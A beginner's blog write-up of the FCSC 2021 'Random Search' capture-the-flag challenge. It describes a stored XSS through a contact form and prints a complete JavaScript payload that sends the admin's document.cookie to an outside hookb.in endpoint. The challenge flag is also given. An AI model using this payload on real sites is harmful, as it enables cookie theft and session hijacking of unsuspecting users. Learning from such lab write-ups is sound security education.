FCSC 2021 – Random Search

This challenge was an introduction one, made for beginners like me.

Looking at the webapp

The web application is located at http://challenges2.france-cybersecurity-challenge.fr:5001/

The web application look
The main page of the application

If we use the search bar :

The web application look once we made a research with it
Results of a research

Looking at the url gives us : http://challenges2.france-cybersecurity-challenge.fr:5001/index.php?search=I+love+cybersecurity+%21

As the tags of the challenge mentioned XSS, I knew where to look at.

The challenge's instructions
The instructions for this challenge

In the contact page , we have an URL input field for found bugs. It looks like a stored XSS…

The contact page look
The contact page

Exploiting the contact page

If we have a contact page, it is likely for the admin to click on links we give him. Our goal is to steal his cookie. The solution I used (I don’t know if there are any different), was to make him send a request to a bin.

Here’s how it works :

We send a link to the admin with a JS HTTP request in URL. Then we wait for him to click on our link and we can steal his cookie.

For this challenge, I used HookBin which is free and damn simple to use.

Here is the script to steak the cookie :

<script>
var xhr = new XMLHttpRequest();

xhr.open("POST", "https://hookb.in/<your_hookbin_id_here>", true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");

xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
        console.log("done.");
    }
};

var data = JSON.stringify({
    "COOKIE": document.cookie
});

xhr.send(data);
</script>

But putting this script as-is in the url won’t work. We have to encode this to URL format. As a MacBook user, I tend to use Boop to do this kind of stuff.

Our stored xss injection script in clear
The script before it’s been URL-encoded

Then by doing ⌘ + B and typing URL Encode, here’s the result :

Our stored xss injection script URL encoded
The script once encoded

Receiving the request

This picture show what’s the result is when the admin clicks on our link :

The result, with our beloved flag

So we’ve stolen the admin cookie and gained 20 points… Which is pretty nice for an absolute n00b like me 😉

Flag : FCSC{4e0451cc88a9a96e7e46947461382008d8c8f4304373b8907964675c27d7c633}

Leave a Comment

Your email address will not be published. Required fields are marked *